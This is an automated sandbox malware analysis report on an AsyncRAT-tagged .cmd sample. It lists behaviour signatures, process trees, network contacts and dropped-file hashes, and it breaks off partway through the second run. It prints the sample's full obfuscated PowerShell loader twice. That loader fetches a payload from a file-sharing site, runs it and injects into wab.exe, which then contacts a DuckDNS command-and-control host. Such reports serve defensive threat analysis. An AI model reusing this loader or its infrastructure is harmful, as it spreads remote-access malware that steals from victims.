Malware Analysis Report

2024-10-23 19:25

Sample ID 240524-pwf3aacf5t
Target b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd
SHA256 b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953
Tags
asyncrat venom clients execution rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953

Threat Level: Known bad

The file b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd was found to be: Known bad.

Malicious Activity Summary

asyncrat venom clients execution rat

AsyncRat

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-24 12:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-24 12:40

Reported

2024-05-24 12:43

Platform

win7-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"

Signatures

AsyncRat

rat asyncrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2536 set thread context of 2388 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1244 wrote to memory of 2188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 2188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 2188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2536 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2536 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2536 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2536 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2536 wrote to memory of 2556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2388 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.sendspace.com udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs12n4.sendspace.com udp
CA 69.31.136.53:443 fs12n4.sendspace.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 104.18.38.233:80 crt.sectigo.com tcp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n5.sendspace.com udp
CA 69.31.136.57:443 fs13n5.sendspace.com tcp
US 8.8.8.8:53 xvern429.duckdns.org udp
US 12.202.180.134:8890 xvern429.duckdns.org tcp

Files

memory/2188-4-0x000007FEF639E000-0x000007FEF639F000-memory.dmp

memory/2188-5-0x000000001B560000-0x000000001B842000-memory.dmp

memory/2188-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

memory/2188-7-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2188-8-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2188-9-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2188-11-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2188-10-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3342.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar3365.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\INKNAZJHNIWR0GXKUZ1Y.temp

MD5 08a0caad60269269f79f8c9a9f1989fa
SHA1 0f2f108f6812fa3f328167becca140efd9717e90
SHA256 2190e67af1a2703e09c423d39284918917bcb4bdc86dc40748124eb01edba932
SHA512 daec82f33675662764c56b4df6fca97c66206335da55413e616062a5f1dc7b5a31c6fcd5ec23526306f622feabecbcb23d68edf582c254a130dffb40e4314938

C:\Users\Admin\AppData\Roaming\Anemotaxis.Saf

MD5 18fc7a00c5b4cd7bf88445aaf24491bf
SHA1 8127f6999587c6b0bfde91fceac9d0106907b9d2
SHA256 38393e1abae0ed937471b6d4196ebbf100921142ea85d266b3505cc24a992fc2
SHA512 0127009c795974510ea898f320450e7bd0b76dd395374c4058adab95e39e27459306cde56de5b39cd38f053513b26eda0d76da34af8cb9ca352daa5d5323ebfb

memory/2188-55-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2536-56-0x00000000065E0000-0x0000000009EF0000-memory.dmp

memory/2188-57-0x000007FEF639E000-0x000007FEF639F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 eb0ef510f2cda52ca27f1c9b257efd9e
SHA1 f140f9c1fbeeef1c30b99d20d4d8f1ded0723b37
SHA256 9022da409c864f2048389197b5745a5dc07c6546a973fbec5260cb3f11033354
SHA512 97143cb9d7cc56b46694ed712a6813ef75ff87ecd8ddc92b81e8e548f505e9a3e0d0a82b7de7525eb0e9d9ca48c8f268db099504918d63bd6c26e8d0fff84c2b

memory/2388-75-0x0000000000CD0000-0x0000000001D32000-memory.dmp

memory/2388-87-0x0000000000CD0000-0x0000000001D32000-memory.dmp

memory/2188-88-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2388-89-0x0000000000CD0000-0x0000000000CE6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-24 12:40

Reported

2024-05-24 12:43

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"

Signatures

AsyncRat

rat asyncrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1844 set thread context of 4896 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1816 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
